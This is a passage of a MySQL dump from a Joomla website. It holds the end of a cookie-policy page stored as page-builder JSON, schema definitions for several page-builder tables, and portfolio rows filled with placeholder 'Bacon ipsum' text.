functionality to you personally by letting us remember your preferences, location or device type;<br />• improving how our website performs;<br />• understanding who our audience is so that we can provide content most relevant to you;<br />• allowing third parties to provide services to our website; and<br />• helping us deliver interest-based advertising where appropriate in compliance with the applicable laws.<br /><br /><strong>The types of cookies we use</strong><br /><br />We use different types of cookies on our website. Some of these cookies are placed by us, while others are placed by our third-party plug-ins, suppliers or advertisers. These cookies may be deleted from your device at different times, such as at the end of your browsing session (when you leave the website) or after a pre-set amount of time, or they may persist on your device until you delete them.<br /><br /><strong>We use the following types of cookies on our website:</strong><br /><br />• essential cookies – these are cookies that allow our website to perform its essential functions. Without these cookies, some parts of our websites would stop working.<br />• site analytics cookies – these are cookies that monitor how our website is performing, and how you interact with it. We use them to know how best to improve our website or services.<br />• functional cookies – these are cookies that remember who you are as a user of our website. We use them to remember any preferences you may have selected on our website, like saving your username and password or settings.<br /><br /><strong>Our cookies</strong><br /><br /><strong>Essential</strong>: Allows our website to perform its essential functions. Without these cookies, some parts of our websites would stop working.<br /><br /><strong>Analytics</strong>: Monitors how our website is performing, and how you interact with it. We use them to know how best to improve our website or services.<br /><br /><strong>Functional</strong>: Remembers who you are as a user of our website. We use them to remember any preferences you may have selected on our website, like saving your username and password or settings.<br /><br /><strong>Deleting cookies</strong><br /><br />Your internet browser generally accepts cookies automatically, but you can often change this setting to stop accepting them. You can also delete cookies manually. You can read how to do this at Digital Trends.<br /><br />Deleting or no longer accepting cookies may prevent you from accessing certain aspects of our website where cookies are necessary or because the website forgot your preferences. <br /><br /><strong>Updates to this policy</strong><br /><br />We may occasionally make changes to this policy. When we make material changes to this policy, we will provide you with a prominent notice on our website or send you an email. We may notify you in advance.\",\"alignment\":\"sppb-text-left\",\"text_fontsize\":{\"md\":\"\",\"sm\":\"\",\"xs\":\"\"},\"text_lineheight\":\"\",\"text_fontweight\":\"\",\"dropcap\":0,\"class\":\"\",\"global_background_type\":\"none\",\"global_background_gradient\":{\"color\":\"#00c6fb\",\"color2\":\"#005bea\",\"deg\":\"45\",\"type\":\"linear\"},\"global_background_repeat\":\"no-repeat\",\"global_background_size\":\"cover\",\"global_background_attachment\":\"inherit\",\"global_background_position\":\"50% 50%\",\"global_use_overlay\":0,\"global_overlay_type\":\"overlay_none\",\"global_gradient_overlay\":{\"color\":\"rgba(127, 0, 255, 0.8)\",\"color2\":\"rgba(225, 0, 255, 0.7)\",\"deg\":\"45\",\"type\":\"linear\"},\"global_pattern_overlay\":\"\",\"global_overlay_pattern_color\":\"\",\"blend_mode\":\"normal\",\"global_user_border\":0,\"global_border_width\":\"\",\"global_border_radius\":0,\"global_margin\":{\"md\":\"0px 0px 30px 0px\",\"sm\":\"0px 0px 20px 0px\",\"xs\":\"0px 0px 10px 0px\"},\"global_padding\":{\"md\":\" \",\"sm\":\" \",\"xs\":\" \"},\"global_boxshadow\":\"0 0 0 0 #ffffff\",\"global_use_animation\":0,\"global_animationduration\":\"300\",\"global_animationdelay\":\"0\",\"global_custom_css\":\"\",\"global_custom_position\":0,\"global_seclect_position\":\"relative\",\"global_addon_position_left\":{\"unit\":\"px\"},\"global_addon_position_top\":{\"unit\":\"px\"},\"use_global_width\":0,\"hidden_md\":0,\"hidden_sm\":0,\"hidden_xs\":0,\"acl\":\"\",\"while_scroll_view\":[{\"enable_while_scroll_view\":0,\"on_scroll_actions\":[{\"id\":\"b3fdc1c1e6bfde5942ea\",\"index\":0,\"keyframe\":0,\"name\":\"move\",\"property\":{\"x\":\"0\",\"y\":\"-100\",\"z\":\"0\"},\"range\":{\"max\":500,\"min\":-500,\"stop\":1},\"single\":true,\"title\":\"Move\"},{\"id\":\"936e0225e6dc8edfba7d\",\"index\":1,\"keyframe\":100,\"name\":\"move\",\"property\":{\"x\":0,\"y\":0,\"z\":0},\"range\":{\"max\":500,\"min\":-500,\"stop\":1},\"single\":true,\"title\":\"Move\"}],\"transition_origin_x\":\"center\",\"transition_origin_y\":\"center\",\"enable_tablet\":0,\"enable_mobile\":0}],\"mouse_movement\":[{\"enable_tilt_effect\":0,\"mouse_tilt_direction\":\"direct\",\"mouse_tilt_speed\":\"1\",\"mouse_tilt_max\":\"15\",\"enable_tablet\":0,\"enable_mobile\":0}],\"font_family\":\"Open Sans\",\"title_text_color\":\"#ef2d2d\",\"text_font_family\":\"\",\"global_text_color\":\"\"}}]}]}]','com_sppagebuilder','page',0,0,1,0,1,0,'0000-00-00 00:00:00',310,'2021-06-01 11:39:46',309,0,'0000-00-00 00:00:00','[]','','','','*',2677,'');
/*!40000 ALTER TABLE `vzx9b_sppagebuilder` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_sppagebuilder_addons`
--
DROP TABLE IF EXISTS `vzx9b_sppagebuilder_addons`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_sppagebuilder_addons` (
`id` int(5) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`code` mediumtext NOT NULL,
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_sppagebuilder_addons`
--
LOCK TABLES `vzx9b_sppagebuilder_addons` WRITE;
/*!40000 ALTER TABLE `vzx9b_sppagebuilder_addons` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_sppagebuilder_addons` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_sppagebuilder_integrations`
--
DROP TABLE IF EXISTS `vzx9b_sppagebuilder_integrations`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_sppagebuilder_integrations` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`description` mediumtext NOT NULL,
`component` varchar(255) NOT NULL,
`plugin` mediumtext NOT NULL,
`state` tinyint(1) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_sppagebuilder_integrations`
--
LOCK TABLES `vzx9b_sppagebuilder_integrations` WRITE;
/*!40000 ALTER TABLE `vzx9b_sppagebuilder_integrations` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_sppagebuilder_integrations` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_sppagebuilder_languages`
--
DROP TABLE IF EXISTS `vzx9b_sppagebuilder_languages`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_sppagebuilder_languages` (
`id` int(5) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`description` varchar(255) DEFAULT NULL,
`lang_tag` varchar(255) NOT NULL DEFAULT '',
`lang_key` varchar(100) DEFAULT NULL,
`version` mediumtext NOT NULL,
`state` tinyint(1) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_sppagebuilder_languages`
--
LOCK TABLES `vzx9b_sppagebuilder_languages` WRITE;
/*!40000 ALTER TABLE `vzx9b_sppagebuilder_languages` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_sppagebuilder_languages` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_sppagebuilder_sections`
--
DROP TABLE IF EXISTS `vzx9b_sppagebuilder_sections`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_sppagebuilder_sections` (
`id` int(5) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`section` mediumtext NOT NULL,
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_sppagebuilder_sections`
--
LOCK TABLES `vzx9b_sppagebuilder_sections` WRITE;
/*!40000 ALTER TABLE `vzx9b_sppagebuilder_sections` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_sppagebuilder_sections` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_spsimpleportfolio_items`
--
DROP TABLE IF EXISTS `vzx9b_spsimpleportfolio_items`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_spsimpleportfolio_items` (
`spsimpleportfolio_item_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`alias` varchar(55) NOT NULL,
`category_id` int(11) NOT NULL,
`image` text NOT NULL,
`video` text NOT NULL,
`description` mediumtext DEFAULT NULL,
`spsimpleportfolio_tag_id` text NOT NULL,
`url` text NOT NULL,
`enabled` tinyint(3) NOT NULL DEFAULT 1,
`language` varchar(255) NOT NULL DEFAULT '*',
`access` int(5) NOT NULL DEFAULT 1,
`ordering` int(10) NOT NULL DEFAULT 0,
`created_by` bigint(20) NOT NULL DEFAULT 0,
`created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` bigint(20) NOT NULL DEFAULT 0,
`modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`locked_by` bigint(20) NOT NULL DEFAULT 0,
`locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`spsimpleportfolio_item_id`)
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_spsimpleportfolio_items`
--
LOCK TABLES `vzx9b_spsimpleportfolio_items` WRITE;
/*!40000 ALTER TABLE `vzx9b_spsimpleportfolio_items` DISABLE KEYS */;
INSERT INTO `vzx9b_spsimpleportfolio_items` VALUES (1,'Responsive news Template','responsive-news-template',0,'images/showcase/showcase01.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"4\"]','',1,'*',1,0,391,'2015-01-22 12:04:57',391,'2015-01-23 10:40:23',0,'0000-00-00 00:00:00'),(2,'Free Joomla Template','free-joomla-template',0,'images/showcase/showcase02.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"1\"]','',1,'*',1,0,391,'2015-01-22 12:05:55',391,'2015-01-23 10:40:31',0,'0000-00-00 00:00:00'),(3,'Helix Free Template','helix-free-template',0,'images/showcase/showcase03.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"1\"]','',1,'*',1,0,391,'2015-01-22 12:06:32',391,'2015-01-23 10:40:03',0,'0000-00-00 00:00:00'),(4,'Corporate Template','corporate-template',0,'images/showcase/showcase04.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"3\"]','',1,'*',1,0,391,'2015-01-22 12:07:01',391,'2015-01-23 10:29:07',391,'2015-01-23 10:39:40'),(5,'SP Page Builder','sp-page-builder',0,'images/showcase/showcase05.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"2\"]','',1,'*',1,0,391,'2015-01-22 12:07:30',391,'2015-01-23 10:28:54',0,'0000-00-00 00:00:00'),(6,'Organic Life Template','organic-life-template',0,'images/showcase/showcase06.jpg','','<p>Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p>Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami. Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball.</p>\r\n<p>Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"1\"]','',1,'*',1,0,391,'2015-01-23 10:06:10',391,'2015-01-23 10:28:42',0,'0000-00-00 00:00:00'),(7,'Helix V3 Free Template','helix-v3-free-template',0,'images/showcase/showcase07.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"2\"]','',1,'*',1,0,391,'2015-01-23 10:07:16',391,'2015-01-23 10:28:29',0,'0000-00-00 00:00:00'),(8,'Optima Premium Template','optima-premium-template',0,'images/showcase/showcase08.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"2\"]','',1,'*',1,0,391,'2015-01-23 10:08:10',391,'2015-01-23 10:28:18',0,'0000-00-00 00:00:00'),(9,'Vocal Music Theme','vocal-music-theme',0,'images/showcase/showcase09.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"4\"]','',1,'*',1,0,391,'2015-01-23 10:08:46',391,'2015-01-23 10:28:04',0,'0000-00-00 00:00:00'),(10,'Travel Premium Theme','travel-premium-theme',0,'images/showcase/showcase10.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"1\"]','',1,'*',1,0,391,'2015-01-23 10:09:23',391,'2015-01-23 10:27:52',0,'0000-00-00 00:00:00'),(11,'Free Magazine Theme','free-magazine-theme',0,'images/showcase/showcase11.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; 